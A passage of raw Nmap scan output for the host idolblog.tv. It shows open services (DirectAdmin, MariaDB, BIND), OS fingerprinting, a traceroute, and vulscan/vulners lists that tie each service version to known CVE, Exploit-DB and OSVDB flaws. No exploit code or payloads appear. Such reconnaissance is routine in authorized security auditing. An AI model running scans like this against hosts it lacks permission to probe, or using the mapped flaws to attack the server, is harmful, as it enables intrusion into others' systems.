17649| [54014] DirectAdmin CMD_DB Database Backup Request Temporary File Symlink Arbitrary File Overwrite
17650| [50253] Dovecot dovecot.conf Permission Weakness Local ssl_key_password Parameter Disclosure
17651| [49918] Dovecot ManageSieve Script Name Handling Traversal Arbitrary File Manipulation
17652| [49429] Dovecot Message Parsing Feature Crafted Email Header Handling Remote DoS
17653| [49099] Dovecot ACL Plugin k Right Mailbox Creation Restriction Bypass
17654| [49098] Dovecot ACL Plugin Negative Access Rights Bypass
17655| [43137] Dovecot mail_extra_groups Symlink File Manipulation
17656| [42979] Dovecot passdbs Argument Injection Authentication Bypass
17657| [39876] Dovecot LDAP Auth Cache Security Bypass
17658| [39386] Dovecot ACL Plugin Insert Right APPEND / COPY Command Unauthorized Flag Manipulation
17659| [36999] DirectAdmin CMD_BANDWIDTH_BREAKDOWN user Parameter XSS
17660| [36339] DirectAdmin CMD_USER_STATS domain Parameter XSS
17661| [35489] Dovecot index/mbox/mbox-storage.c Traversal Arbitrary Gzip File Access
17662| [34687] DirectAdmin http/ftp XSS Log Viewer Data Injection
17663| [34273] DirectAdmin CMD_USER_STATS RESULT Parameter XSS
17664| [32676] DirectAdmin CMD_FTP_SHOW DOMAIN Parameter XSS
17665| [32675] DirectAdmin CMD_EMAIL_LIST name Parameter XSS
17666| [32674] DirectAdmin CMD_EMAIL_VACATION_MODIFY user Parameter XSS
17667| [32673] DirectAdmin CMD_TICKET type Parameter XSS
17668| [32672] DirectAdmin CMD_EMAIL_FORWARDER_MODIFY user Parameter XSS
17669| [32671] DirectAdmin CMD_TICKET_CREATE TYPE Parameter XSS
17670| [32670] DirectAdmin CMD_SHOW_USER user Parameter XSS
17671| [32669] DirectAdmin CMD_SHOW_RESELLER user Parameter XSS
17672| [30524] Dovecot IMAP/POP3 Server dovecot.index.cache Handling Overflow
17673| [25853] Cyrus IMAPD pop3d USER Command Remote Overflow
17674| [25727] Dovecot Multiple Command Traversal Arbitrary Directory Listing
17675| [25138] DirectAdmin HTM_PASSWD domain Parameter XSS
17676| [23281] Dovecot imap/pop3-login dovecot-auth DoS
17677| [23280] Dovecot Malformed APPEND Command DoS
17678| [14459] mmmail mmpop3d USER Command mmsyslog Function Format String
17679| [12033] Slackware Linux imapd/ipop3d Malformed USER/PASS Sequence DoS
17680| [5857] Linux pop3d Arbitrary Mail File Access
17681| [2471] akpop3d username SQL Injection
17682|_
176832222/tcp open http syn-ack DirectAdmin httpd 1.53.0 (Registered to Ecatel International Network)
17684|_http-trane-info: Problem with XML parsing of /evox/about
17685| vulscan: VulDB - https://vuldb.com:
17686| [134243] InfinitumIT DirectAdmin up to 1.561 FileManager CSRF privilege escalation
17687| [131477] JBMC DirectAdmin 1.55 /CMD_ACCOUNT_ADMIN cross site request forgery
17688| [112266] JBMC DirectAdmin up to 1.51 email_ftp_password_change Setting memory corruption
17689| [95172] Directadmin Controlpanel 1.50.1 /CMD_SELECT_USERS cross site scripting
17690| [95100] DirectAdmin up to 1.50.1 Crash denial of service
17691| [62578] DirectAdmin 1.403 cross site scripting
17692| [61198] Jbmc-software DirectAdmin 1.403 cross site scripting
17693| [48756] Jbmc-software DirectAdmin up to 1.292 cross site scripting
17694| [48060] Jbmc-software DirectAdmin up to 1.17 privilege escalation
17695| [38747] DirectAdmin 1.30.2 cross site scripting
17696| [37578] DirectAdmin 1.30.1 cross site scripting
17697| [36066] JBMC Software DirectAdmin 1.293 cross site scripting
17698| [35680] Jbmc Software DirectAdmin 1.293 cross site scripting
17699| [33341] JBMC Software DirectAdmin 1.28.1 cross site scripting
17700| [30021] Jbmc Software DirectAdmin 1.26.6 cross site scripting
17701|
17702| MITRE CVE - https://cve.mitre.org:
17703| [CVE-2012-5305] Cross-site scripting (XSS) vulnerability in CMD_DOMAIN in JBMC Software DirectAdmin 1.403 allows remote attackers to inject arbitrary web script or HTML via the domain parameter.
17704| [CVE-2012-3842] Multiple cross-site scripting (XSS) vulnerabilities in CMD_DOMAIN in JBMC Software DirectAdmin 1.403 allow remote authenticated users with certain privileges to inject arbitrary web script or HTML via the (1) select0 or (2) select8 parameters.
17705| [CVE-2009-2216] Cross-site scripting (XSS) vulnerability in CMD_REDIRECT in DirectAdmin 1.33.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the URI in a view=advanced request.
17706| [CVE-2009-1526] JBMC Software DirectAdmin before 1.334 allows local users to create or overwrite any file via a symlink attack on an arbitrary file in a certain temporary directory, related to a request for this temporary file in the PATH_INFO to the CMD_DB script during a backup action.
17707| [CVE-2009-1525] CMD_DB in JBMC Software DirectAdmin before 1.334 allows remote authenticated users to gain privileges via shell metacharacters in the name parameter during a restore action.
17708| [CVE-2007-4830] Cross-site scripting (XSS) vulnerability in CMD_BANDWIDTH_BREAKDOWN in DirectAdmin 1.30.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the user parameter.
17709| [CVE-2007-3501] Cross-site scripting (XSS) vulnerability in CMD_USER_STATS in DirectAdmin 1.30.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the domain parameter, a different vector than CVE-2007-1508.
17710| [CVE-2007-1926] Cross-site scripting (XSS) vulnerability in JBMC Software DirectAdmin before 1.293 does not properly display log files, which allows remote authenticated users to inject arbitrary web script or HTML via (1) http or (2) ftp requests logged in /var/log/directadmin/security.log
17711| [CVE-2006-5983] Multiple cross-site scripting (XSS) vulnerabilities in JBMC Software DirectAdmin 1.28.1 allow remote authenticated users to inject arbitrary web script or HTML via the (1) user parameter to (a) CMD_SHOW_RESELLER or (b) CMD_SHOW_USER in the Admin level
17712|
17713| SecurityFocus - https://www.securityfocus.com/bid/:
17714| [83952] DirectAdmin CVE-2006-2153 Cross-Site Scripting Vulnerability
17715| [63911] Installatron Plugin for DirectAdmin Insecure Temporary File Creation Vulnerability
17716| [63373] Installatron Plugin for DirectAdmin cURL Output Remote Privilege Escalation Vulnerability
17717| [62929] DirectAdmin Backup Multiple Security Vulnerabilities
17718| [61017] DirectAdmin Symlink Attack Multiple Remote Privilege Escalation Vulnerabilities
17719| [53281] DirectAdmin Multiple Cross Site Scripting Vulnerabilities
17720| [52848] RETIRED: DirectAdmin 'CMD_DOMAIN' Cross-Site Scripting Vulnerability
17721| [52845] JBMC Software DirectAdmin 'domain' Parameter Cross Site Scripting Vulnerability
17722| [47693] DirectAdmin 'mysql_backup' Folder Permissions Information Disclosure Vulnerability
17723| [47690] DirectAdmin Hard Link Local Privilege Escalation Vulnerability
17724| [38721] DirectAdmin 'CMD_DB_VIEW' Cross-Site Scripting Vulnerability
17725| [35450] DirectAdmin 'CMD_REDIRECT' Cross-Site Scripting Vulnerability
17726| [34678] DirectAdmin '/CMD_DB' Restore Action Local Privilege Escalation Vulnerability
17727| [34676] DirectAdmin '/CMD_DB' Backup Action Insecure Temporary File Creation Vulnerability
17728| [25607] DirectAdmin CMD_BANDWIDTH_BREAKDOWN Cross-Site Scripting Vulnerability
17729| [24688] DirectAdmin Domain Parameter Cross-Site Scripting Vulnerability
17730| [23254] DirectAdmin Logfile HTML Injection Vulnerability
17731| [22996] DirectAdmin CMD_USER_STATS Cross-Site Scripting Vulnerability
17732| [21049] DirectAdmin Multiple Cross-Site Scripting Vulnerabilities
17733|
17734| IBM X-Force - https://exchange.xforce.ibmcloud.com:
17735| [85490] DirectAdmin Backup System email account functionality symlink
17736| [85488] DirectAdmin Backup System symlink
17737| [74569] DirectAdmin CMD_DOMAIN cross-site scripting
17738| [72685] DirectAdmin domain parameter cross-site request forgery
17739| [67254] DirectAdmin MySQL information disclosure
17740| [67253] DirectAdmin hard link privilege escalation
17741| [56875] DirectAdmin name cross-site scripting
17742| [55181] DirectAdmin account cross-site request forgery
17743| [51292] DirectAdmin CMD_REDIRECT cross-site scripting
17744| [50167] DirectAdmin CMD_DB command execution
17745| [49416] DirectAdmin CMD_DB backup action symlink
17746| [36510] DirectAdmin user parameter cross-site scripting
17747| [35177] DirectAdmin domain parameter cross-site scripting
17748| [33390] DirectAdmin log file cross-site scripting
17749| [33023] DirectAdmin CMD_USER_STATS form cross-site scripting
17750| [30256] DirectAdmin user, TYPE, and name parameters cross-site scripting
17751|
17752| Exploit-DB - https://www.exploit-db.com:
17753| [29747] DirectAdmin 1.292 CMD_USER_STATS Cross-Site Scripting Vulnerability
17754| [29006] DirectAdmin 1.28/1.29 CMD_FTP_SHOW DOMAIN Parameter XSS
17755| [29005] DirectAdmin 1.28/1.29 CMD_EMAIL_LIST name Parameter XSS
17756| [29004] DirectAdmin 1.28/1.29 CMD_EMAIL_VACATION_MODIFY user Parameter XSS
17757| [29003] DirectAdmin 1.28/1.29 CMD_TICKET type Parameter XSS
17758| [29002] DirectAdmin 1.28/1.29 CMD_EMAIL_FORWARDER_MODIFY user Parameter XSS
17759| [29001] DirectAdmin 1.28/1.29 CMD_TICKET_CREATE TYPE Parameter XSS
17760| [29000] DirectAdmin 1.28/1.29 CMD_SHOW_USER user Parameter XSS
17761| [28999] DirectAdmin 1.28/1.29 CMD_SHOW_RESELLER user Parameter XSS
17762| [11813] DirectAdmin 1.34.4 - Multi CSRF vulnerability
17763| [11029] DirectAdmin <= 1.33.6 Symlink Permission Bypass
17764| [10779] DirectAdmin 1.34.0 - CSRF Create Administrator Vulnerability
17765|
17766| OpenVAS (Nessus) - http://www.openvas.org:
17767| No findings
17768|
17769| SecurityTracker - https://www.securitytracker.com:
17770| [1028744] DirectAdmin Backup System Flaws Let Local Users Gain Elevated Privileges
17771|
17772| OSVDB - http://www.osvdb.org:
17773| [94899] DirectAdmin Backup System Unspecified Email Account Function Symlink Local Privilege Escalation
17774| [94898] DirectAdmin Backup System Unspecified Symlink Arbitrary File Manipulation Local Privilege Escalation
17775| [80919] DirectAdmin CMD_DOMAIN Multiple Parameter XSS
17776| [72120] DirectAdmin mysql_backups Folder MySQL Database Backup Local Disclosure
17777| [72119] DirectAdmin Backup Creation Hard Link Check Weakness Local Privilege Escalation
17778| [62914] DirectAdmin CMD_DB_VIEW name Parameter XSS
17779| [61395] DirectAdmin Admin Account Creation CSRF
17780| [55296] DirectAdmin CMD_REDIRECT URL Parameter XSS
17781| [54015] DirectAdmin CMD_DB name Parameter Shell Metacharacter Arbitrary Command Execution
17782| [54014] DirectAdmin CMD_DB Database Backup Request Temporary File Symlink Arbitrary File Overwrite
17783| [36999] DirectAdmin CMD_BANDWIDTH_BREAKDOWN user Parameter XSS
17784| [36339] DirectAdmin CMD_USER_STATS domain Parameter XSS
17785| [34687] DirectAdmin http/ftp XSS Log Viewer Data Injection
17786| [34273] DirectAdmin CMD_USER_STATS RESULT Parameter XSS
17787| [32676] DirectAdmin CMD_FTP_SHOW DOMAIN Parameter XSS
17788| [32675] DirectAdmin CMD_EMAIL_LIST name Parameter XSS
17789| [32674] DirectAdmin CMD_EMAIL_VACATION_MODIFY user Parameter XSS
17790| [32673] DirectAdmin CMD_TICKET type Parameter XSS
17791| [32672] DirectAdmin CMD_EMAIL_FORWARDER_MODIFY user Parameter XSS
17792| [32671] DirectAdmin CMD_TICKET_CREATE TYPE Parameter XSS
17793| [32670] DirectAdmin CMD_SHOW_USER user Parameter XSS
17794| [32669] DirectAdmin CMD_SHOW_RESELLER user Parameter XSS
17795| [25138] DirectAdmin HTM_PASSWD domain Parameter XSS
17796|_
177973306/tcp open mysql syn-ack MariaDB (unauthorized)
17798| vulscan: VulDB - https://vuldb.com:
17799| [118932] MariaDB on Node.js Environment Variable Backdoor privilege escalation
17800| [112436] MariaDB/XtraDB Cluster Access Restriction event_data_objects.cc privilege escalation
17801| [96814] MariaDB up to 5.5.54/10.0.29/10.1.21/10.2.3 libmysqlclient.so denial of service
17802| [92497] Pivotal Cloud Foundry MariaDB audit_plugin Cleartext information disclosure
17803| [91506] MariaDB Logging my.cnf privilege escalation
17804| [80715] MariaDB up to 5.5.46/10.0.22/10.1.9 sql-common/client.c ssl_verify_server_cert spoofing
17805| [12626] MariaDB 5.5.31 UPDATE Statement denial of service
17806| [12625] MariaDB 5.5.31 JOIN denial of service
17807| [12624] MariaDB 5.5.31 SELECT Statement denial of service
17808| [12623] MariaDB 5.5.31 NAME_CONST Expression denial of service
17809| [12622] MariaDB 5.5.31 KILL QUERY Statement denial of service
17810| [12621] MariaDB 5.5.31 SELECT Statement NULL Pointer Dereference denial of service
17811| [65143] MariaDB up to 5.5.28 MySQL privilege escalation
17812| [63389] MariaDB up to 5.5.25 Replication sql injection
17813|
17814| MITRE CVE - https://cve.mitre.org:
17815| [CVE-2013-1861] MariaDB 5.5.x before 5.5.30, 5.3.x before 5.3.13, 5.2.x before 5.2.15, and 5.1.x before 5.1.68, and Oracle MySQL 5.1.69 and earlier, 5.5.31 and earlier, and 5.6.11 and earlier allows remote attackers to cause a denial of service (crash) via a crafted geometry feature that specifies a large number of points, which is not properly handled when processing the binary representation of this feature, related to a numeric calculation error.
17816| [CVE-2012-5615] MySQL 5.5.19 and possibly other versions, and MariaDB 5.5.28a, 5.3.11, 5.2.13, 5.1.66, and possibly other versions, generates different error messages with different time delays depending on whether a user name exists, which allows remote attackers to enumerate valid usernames.
17817| [CVE-2012-5614] Oracle MySQL 5.1.67 and earlier and 5.5.29 and earlier, and MariaDB 5.5.28a and possibly other versions, allows remote authenticated users to cause a denial of service (mysqld crash) via a SELECT command with an UpdateXML command containing XML with a large number of unique, nested elements.
17818| [CVE-2012-5613] ** DISPUTED ** MySQL 5.5.19 and possibly other versions, and MariaDB 5.5.28a and possibly other versions, when configured to assign the FILE privilege to users who should not have administrative privileges, allows remote authenticated users to gain privileges by leveraging the FILE privilege to create files as the MySQL administrator. NOTE: the vendor disputes this issue, stating that this is only a vulnerability when the administrator does not follow recommendations in the product's installation documentation. NOTE: it could be argued that this should not be included in CVE because it is a configuration issue.
17819| [CVE-2012-5612] Heap-based buffer overflow in Oracle MySQL 5.5.19 and other versions through 5.5.28, and MariaDB 5.5.28a and possibly other versions, allows remote authenticated users to cause a denial of service (memory corruption and crash) and possibly execute arbitrary code, as demonstrated using certain variations of the (1) USE, (2) SHOW TABLES, (3) DESCRIBE, (4) SHOW FIELDS FROM, (5) SHOW COLUMNS FROM, (6) SHOW INDEX FROM, (7) CREATE TABLE, (8) DROP TABLE, (9) ALTER TABLE, (10) DELETE FROM, (11) UPDATE, and (12) SET PASSWORD commands.
17820| [CVE-2012-5611] Stack-based buffer overflow in the acl_get function in Oracle MySQL 5.5.19 and other versions through 5.5.28, and 5.1.53 and other versions through 5.1.66, and MariaDB 5.5.2.x before 5.5.28a, 5.3.x before 5.3.11, 5.2.x before 5.2.13 and 5.1.x before 5.1.66, allows remote authenticated users to execute arbitrary code via a long argument to the GRANT FILE command.
17821| [CVE-2012-4414] Multiple SQL injection vulnerabilities in the replication code in Oracle MySQL possibly before 5.5.29, and MariaDB 5.1.x through 5.1.62, 5.2.x through 5.2.12, 5.3.x through 5.3.7, and 5.5.x through 5.5.25, allow remote authenticated users to execute arbitrary SQL commands via vectors related to the binary log. NOTE: as of 20130116, Oracle has not commented on claims from a downstream vendor that the fix in MySQL 5.5.29 is incomplete.
17822| [CVE-2012-2122] sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x before 5.5.23, when running in certain environments with certain implementations of the memcmp function, allows remote attackers to bypass authentication by repeatedly authenticating with the same incorrect password, which eventually causes a token comparison to succeed due to an improperly-checked return value.
17823|
17824| SecurityFocus - https://www.securityfocus.com/bid/:
17825| [96162] MariaDB and MySQL CVE-2017-3302 Denial of Service Vulnerability
17826| [85985] MariaDB and MySQL CVE-2015-5969 Local Information Disclosure Vulnerability
17827| [81810] MariaDB/MySQL/Percona Server CVE-2016-2047 SSL Certificate Validation Security Bypass Vulnerability
17828| [65757] MariaDB Prior to 5.5.35 Remote Multiple Denial of Service Vulnerabilities
17829| [65312] MariaDB Remote Multiple Denial of Service Vulnerabilities
17830| [62085] MariaDB Local Multiple Denial of Service Vulnerabilities
17831| [58511] MySQL and MariaDB Geometry Query Denial Of Service Vulnerability
17832| [56837] Oracle MySQL and MariaDB CVE-2012-5627 Insecure Salt Generation Security Bypass Weakness
17833| [56769] Oracle MySQL and MariaDB 'acl_get()' Buffer Overflow Vulnerability
17834| [56750] RETIRED: MariaDB CVE-2012-5579 Buffer Overflow Vulnerability
17835| [55498] MariaDB CVE-2012-4414 Multiple SQL Injection Vulnerabilities
17836| [55460] MariaDB Multiple Denial Of Service Vulnerabilities
17837| [53922] RETIRED: MySQL and MariaDB 'sql/password.c' Authentication Bypass Vulnerability
17838|
17839| IBM X-Force - https://exchange.xforce.ibmcloud.com:
17840| [82895] Oracle MySQL and MariaDB geometry queries denial of service
17841| [80553] Oracle MySQL and MariaDB salt security bypass
17842| [80412] MariaDB unspecified buffer overflow
17843| [78421] MariaDB multiple SQL injection
17844| [78383] MariaDB cache denial of service
17845| [78382] MariaDB select_describe() denial of service
17846| [78381] MariaDB test_if_skip_sort_order() denial of service
17847|
17848| Exploit-DB - https://www.exploit-db.com:
17849| No findings
17850|
17851| OpenVAS (Nessus) - http://www.openvas.org:
17852| No findings
17853|
17854| SecurityTracker - https://www.securitytracker.com:
17855| No findings
17856|
17857| OSVDB - http://www.osvdb.org:
17858| [91416] MariaDB Raw Geometry Object String Conversion Remote DoS
17859| [89050] MariaDB Multiple Unspecified SQL Injection
17860| [88060] MariaDB Unspecified Overflow
17861| [85255] MariaDB Query Cache Parallel Query Parsing Remote DoS
17862| [85254] MariaDB sql/sql_select.cc select_describe() Function In Use Table Freeing Query Parsing Remote DoS
17863| [85253] MariaDB sql_select.cc test_if_skip_sort_order() Function NULL Pointer Dereference Query Parsing Remote DoS
17864| [82823] MariaDB Authentication Protocol Token Comparison Casting Failure Password Bypass
17865|_
178661 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
17867SF-Port993-TCP:V=7.70%T=SSL%I=7%D=7/20%Time=5D32CCA6%P=x86_64-pc-linux-gnu
17868SF:%r(NULL,6A,"\*\x20OK\x20\[CAPABILITY\x20IMAP4rev1\x20SASL-IR\x20LOGIN-R
17869SF:EFERRALS\x20ID\x20ENABLE\x20IDLE\x20LITERAL\+\x20AUTH=PLAIN\]\x20Doveco
17870SF:t\x20DA\x20ready\.\r\n");
17871OS fingerprint not ideal because: Didn't receive UDP response. Please try again with -sSU
17872Aggressive OS guesses: Linux 3.10 - 4.11 (94%), Linux 3.18 (91%), Linux 3.2 - 4.9 (91%), Linux 3.13 (90%), Linux 3.13 or 4.2 (90%), Linux 4.10 (90%), Linux 4.2 (90%), Linux 4.4 (90%), Asus RT-AC66U WAP (90%), Linux 3.10 (90%)
17873No exact OS matches for host (test conditions non-ideal).
17874TCP/IP fingerprint:
17875SCAN(V=7.70%E=4%D=7/20%OT=21%CT=1%CU=%PV=N%DS=10%DC=T%G=N%TM=5D32CCDE%P=x86_64-pc-linux-gnu)
17876SEQ(SP=105%GCD=1%ISR=10A%TI=Z%CI=I%II=I%TS=A)
17877OPS(O1=M44FST11NW7%O2=M44FST11NW7%O3=M44FNNT11NW7%O4=M44FST11NW7%O5=M44FST11NW7%O6=M44FST11)
17878WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)
17879ECN(R=Y%DF=Y%TG=40%W=7210%O=M44FNNSNW7%CC=Y%Q=)
17880T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
17881T2(R=N)
17882T3(R=N)
17883T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
17884T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
17885T6(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
17886T7(R=N)
17887U1(R=N)
17888IE(R=Y%DFI=N%TG=40%CD=S)
17889
17890Uptime guess: 2.198 days (since Wed Jul 17 23:27:38 2019)
17891Network Distance: 10 hops
17892TCP Sequence Prediction: Difficulty=261 (Good luck!)
17893IP ID Sequence Generation: All zeros
17894Service Info: Host: g16s35.novogara.com; OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:7
17895
17896TRACEROUTE (using proto 1/icmp)
17897HOP RTT ADDRESS
178981 175.24 ms 10.247.200.1
178992 176.70 ms 213.184.122.97
179003 175.86 ms bzq-82-80-246-9.cablep.bezeqint.net (82.80.246.9)
179014 175.79 ms bzq-219-189-185.dsl.bezeqint.net (62.219.189.185)
179025 175.85 ms bzq-219-189-2.cablep.bezeqint.net (62.219.189.2)
179036 236.45 ms bzq-219-189-73.dsl.bezeqint.net (62.219.189.73)
179047 243.79 ms linx-224.retn.net (195.66.224.193)
179058 244.27 ms ae0-2.RT.IR9.AMS.NL.retn.net (87.245.232.123)
179069 ...
1790710 236.14 ms 89.248.174.131
17908
17909NSE: Script Post-scanning.
17910NSE: Starting runlevel 1 (of 2) scan.
17911Initiating NSE at 04:12
17912Completed NSE at 04:12, 0.00s elapsed
17913NSE: Starting runlevel 2 (of 2) scan.
17914Initiating NSE at 04:12
17915Completed NSE at 04:12, 0.00s elapsed
17916Read data files from: /usr/bin/../share/nmap
17917OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
17918Nmap done: 1 IP address (1 host up) scanned in 474.10 seconds
17919 Raw packets sent: 77 (6.512KB) | Rcvd: 116 (27.082KB)
17920######################################################################################################################################
17921Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-20 04:12 EDT
17922NSE: Loaded 45 scripts for scanning.
17923NSE: Script Pre-scanning.
17924Initiating NSE at 04:12
17925Completed NSE at 04:12, 0.00s elapsed
17926Initiating NSE at 04:12
17927Completed NSE at 04:12, 0.00s elapsed
17928Initiating Parallel DNS resolution of 1 host. at 04:12
17929Completed Parallel DNS resolution of 1 host. at 04:12, 0.03s elapsed
17930Initiating UDP Scan at 04:12
17931Scanning idolblog.tv (89.248.174.131) [14 ports]
17932Discovered open port 53/udp on 89.248.174.131
17933Completed UDP Scan at 04:12, 6.40s elapsed (14 total ports)
17934Initiating Service scan at 04:12
17935Scanning 1 service on idolblog.tv (89.248.174.131)
17936Completed Service scan at 04:12, 0.24s elapsed (1 service on 1 host)
17937Initiating OS detection (try #1) against idolblog.tv (89.248.174.131)
17938Retrying OS detection (try #2) against idolblog.tv (89.248.174.131)
17939Initiating Traceroute at 04:12
17940Completed Traceroute at 04:12, 7.20s elapsed
17941Initiating Parallel DNS resolution of 1 host. at 04:12
17942Completed Parallel DNS resolution of 1 host. at 04:12, 0.00s elapsed
17943NSE: Script scanning 89.248.174.131.
17944Initiating NSE at 04:12
17945Completed NSE at 04:12, 9.20s elapsed
17946Initiating NSE at 04:12
17947Completed NSE at 04:12, 0.00s elapsed
17948Nmap scan report for idolblog.tv (89.248.174.131)
17949Host is up (0.23s latency).
17950
17951PORT STATE SERVICE VERSION
1795253/udp open domain ISC BIND 9.9.4 (RedHat Enterprise Linux 7)
17953| vulners:
17954| cpe:/a:isc:bind:9.9.4:
17955| CVE-2015-4620 7.8 https://vulners.com/cve/CVE-2015-4620
17956| CVE-2014-8500 7.8 https://vulners.com/cve/CVE-2014-8500
17957| CVE-2017-3141 7.2 https://vulners.com/cve/CVE-2017-3141
17958| CVE-2015-8461 7.1 https://vulners.com/cve/CVE-2015-8461
17959| CVE-2013-6230 6.8 https://vulners.com/cve/CVE-2013-6230
17960| CVE-2015-1349 5.4 https://vulners.com/cve/CVE-2015-1349
17961| CVE-2018-5740 5.0 https://vulners.com/cve/CVE-2018-5740
17962| CVE-2017-3145 5.0 https://vulners.com/cve/CVE-2017-3145
17963| CVE-2016-9131 5.0 https://vulners.com/cve/CVE-2016-9131
17964| CVE-2016-8864 5.0 https://vulners.com/cve/CVE-2016-8864
17965| CVE-2016-1286 5.0 https://vulners.com/cve/CVE-2016-1286
17966| CVE-2015-8000 5.0 https://vulners.com/cve/CVE-2015-8000
17967| CVE-2017-3143 4.3 https://vulners.com/cve/CVE-2017-3143
17968| CVE-2017-3142 4.3 https://vulners.com/cve/CVE-2017-3142
17969| CVE-2017-3136 4.3 https://vulners.com/cve/CVE-2017-3136
17970| CVE-2016-2775 4.3 https://vulners.com/cve/CVE-2016-2775
17971| CVE-2016-1285 4.3 https://vulners.com/cve/CVE-2016-1285
17972| CVE-2018-5741 4.0 https://vulners.com/cve/CVE-2018-5741
17973| CVE-2016-6170 4.0 https://vulners.com/cve/CVE-2016-6170
17974|_ CVE-2014-0591 2.6 https://vulners.com/cve/CVE-2014-0591
17975| vulscan: VulDB - https://vuldb.com:
17976| [11804] ISC BIND up to 9.9.4 DNS Query bin/named/query.c query_findclosestnsec3() denial of service
17977| [11104] ISC BIND up to 9.9.4 WSAloctl Winsock API Bypass privilege escalation
17978| [9764] ISC BIND up to 9.9.4 RDATA rdata.c denial of service
17979| [119548] ISC BIND 9.9.12/9.10.7/9.11.3/9.12.1-P2 Recursion information disclosure
17980| [95202] ISC BIND up to 9.9.9-P4/9.10.4-P4/9.11.0-P1 DNSSEC denial of service
17981| [95201] ISC BIND up to 9.9.9-P4/9.10.4-P4/9.11.0-P1 DS Record Response denial of service
17982| [95200] ISC BIND up to 9.9.9-P4/9.10.4-P4/9.11.0-P1 ANY Query Response denial of service
17983| [89850] ISC BIND up to 9.9.9-P1/9.10.4-P1/9.11.0b1 Lightweight Resolution named.conf denial of service
17984| [81312] ISC BIND up to 9.9.8-P3/9.10.3-P3 named db.c/resolver.c Signature Record denial of service
17985| [81311] ISC BIND up to 9.9.8-P3/9.10.3-P3 named alist.c/sexpr.c denial of service
17986| [80787] ISC BIND up to 9.9.8-S4 Query rdataset.c denial of service
17987| [79802] ISC BIND 9.9.0/9.10.0/9.10.1-P1 Socket Error resolver.c denial of service
17988| [79801] ISC BIND 9.9.0/9.10.0/9.10.1-P1 Response db.c denial of service
17989| [76834] ISC BIND up to 9.9.7-P1/9.10.2-P2 TKEY Query Packet Crash denial of service
17990| [8108] ISC BIND up to 9.9.3 on Unix/Linux Regular Expression denial of service
17991| [7079] ISC BIND up to 9.9.1 DNS64 IPv6 Transition Mechanism denial of service
17992| [6295] ISC BIND up to 9.9.1-P2 Assertion Error Resource Record Parser RDATA Query denial of service
17993| [5875] ISC BIND 9.9.0/9.9.1 denial of service
17994| [5874] ISC BIND up to 9.9.1-P1 denial of service
17995| [5483] ISC BIND up to 9.9.1 DNS Resource Record information disclosure
17996|
17997| MITRE CVE - https://cve.mitre.org:
17998| [CVE-2013-4854] The RFC 5011 implementation in rdata.c in ISC BIND 9.7.x and 9.8.x before 9.8.5-P2, 9.8.6b1, 9.9.x before 9.9.3-P2, and 9.9.4b1, and DNSco BIND 9.9.3-S1 before 9.9.3-S1-P1 and 9.9.4-S1b1, allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query with a malformed RDATA section that is not properly handled during construction of a log message, as exploited in the wild in July 2013.
17999| [CVE-2013-3919] resolver.c in ISC BIND 9.8.5 before 9.8.5-P1, 9.9.3 before 9.9.3-P1, and 9.6-ESV-R9 before 9.6-ESV-R9-P1, when a recursive resolver is configured, allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query for a record in a malformed zone.
18000| [CVE-2013-2266] libdns in ISC BIND 9.7.x and 9.8.x before 9.8.4-P2, 9.8.5 before 9.8.5b2, 9.9.x before 9.9.2-P2, and 9.9.3 before 9.9.3b2 on UNIX platforms allows remote attackers to cause a denial of service (memory consumption) via a crafted regular expression, as demonstrated by a memory-exhaustion attack against a machine running a named process.
18001| [CVE-2012-5689] ISC BIND 9.8.x through 9.8.4-P1 and 9.9.x through 9.9.2-P1, in certain configurations involving DNS64 with a Response Policy Zone that lacks an AAAA rewrite rule, allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query for an AAAA record.
18002| [CVE-2012-5688] ISC BIND 9.8.x before 9.8.4-P1 and 9.9.x before 9.9.2-P1, when DNS64 is enabled, allows remote attackers to cause a denial of service (assertion failure and daemon exit) via a crafted query.
18003| [CVE-2012-5166] ISC BIND 9.x before 9.7.6-P4, 9.8.x before 9.8.3-P4, 9.9.x before 9.9.1-P4, and 9.4-ESV and 9.6-ESV before 9.6-ESV-R7-P4 allows remote attackers to cause a denial of service (named daemon hang) via unspecified combinations of resource records.
18004| [CVE-2012-4244] ISC BIND 9.x before 9.7.6-P3, 9.8.x before 9.8.3-P3, 9.9.x before 9.9.1-P3, and 9.4-ESV and 9.6-ESV before 9.6-ESV-R7-P3 allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query for a long resource record.
18005| [CVE-2012-3868] Race condition in the ns_client structure management in ISC BIND 9.9.x before 9.9.1-P2 allows remote attackers to cause a denial of service (memory consumption or process exit) via a large volume of TCP queries.
18006| [CVE-2012-1667] ISC BIND 9.x before 9.7.6-P1, 9.8.x before 9.8.3-P1, 9.9.x before 9.9.1-P1, and 9.4-ESV and 9.6-ESV before 9.6-ESV-R7-P1 does not properly handle resource records with a zero-length RDATA section, which allows remote DNS servers to cause a denial of service (daemon crash or data corruption) or obtain sensitive information from process memory via a crafted record.
18007| [CVE-2011-4313] query.c in ISC BIND 9.0.x through 9.6.x, 9.4-ESV through 9.4-ESV-R5, 9.6-ESV through 9.6-ESV-R5, 9.7.0 through 9.7.4, 9.8.0 through 9.8.1, and 9.9.0a1 through 9.9.0b1 allows remote attackers to cause a denial of service (assertion failure and named exit) via unknown vectors related to recursive DNS queries, error logging, and the caching of an invalid record by the resolver.
